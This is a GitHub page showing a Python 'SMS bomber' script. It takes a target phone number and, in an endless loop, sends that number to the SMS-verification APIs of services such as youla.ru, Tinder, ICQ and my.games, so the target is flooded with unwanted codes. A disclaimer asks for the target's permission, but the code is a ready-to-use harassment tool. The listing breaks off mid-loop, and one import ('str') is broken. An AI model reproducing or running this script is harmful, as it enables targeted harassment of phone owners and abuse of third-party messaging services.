-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathSMSBOMBER.py
65 lines (58 loc) · 2.08 KB
/
SMSBOMBER.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
import requests, random
import urllib
import colorama
import os
import str
print("""
_.-^^---....,,----
_-- sms --__
< bomber >)
| developed by: |
\._ARESCYBERTEAM _./
```--. . , ; .--'''
| | |
.-=|| | |=-.
`-=#$%&%$#=-'
| ; :|
_____.,-#%&$@%#&#~,._____
""")
"""
Kod ile yapacağınız herhangi bir işlemden ben sorumlu değilim. Bu riski göz önüne alarak kullanın.
This application is for private or educational purposes only.
Do not use it on other people without their permission.
I do not accept responsibility for caused by the use of this code.
By using the this code,you automatically accept that you yourself are criminally responsible for yourself and you are aware that it violates the guidelines.
"""
colors=['\033[1;31m','\033[1;32m','\033[1;33m','\033[1;34m','\033[1;35m','\033[1;36m']
_phone = input('Enter Target Phone Number Without (+):')
_name = ''
for x in range(12):
_name = _name + random.choice(list('qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM123456789'))
password = _name + random.choice(list('qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM123456789'))
username = _name + random.choice(list('qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM123456789'))
_phone9 = _phone[1:]
num = _phone
numplus = '+' + num
print(random.choice(colors))
while True:
#1
try:
print(requests.post('https://youla.ru/web-api/auth/request_code', json = {"phone":numplus}))
except:
print("Failed.")
#2
try:
print(requests.post('https://api.gotinder.com/v2/auth/sms/send?auth_type=sms&locale=ru', json= {"phone_number":numplus}))
except:
print("Failed.")
#3
try:
print(requests.post('https://www.icq.com/smsreg/requestPhoneValidation.php/?msisdn={}&locale=en&countryCode=ru&k=ic1rtwz1s1Hj1O0r&version=1&r=46763'.format(num)))
except:
print("Failed.")
#4
try:
print(requests.post('https://account.my.games/signup_send_sms/', data={'phone': _phone}))
except:
print("Failed.")
#5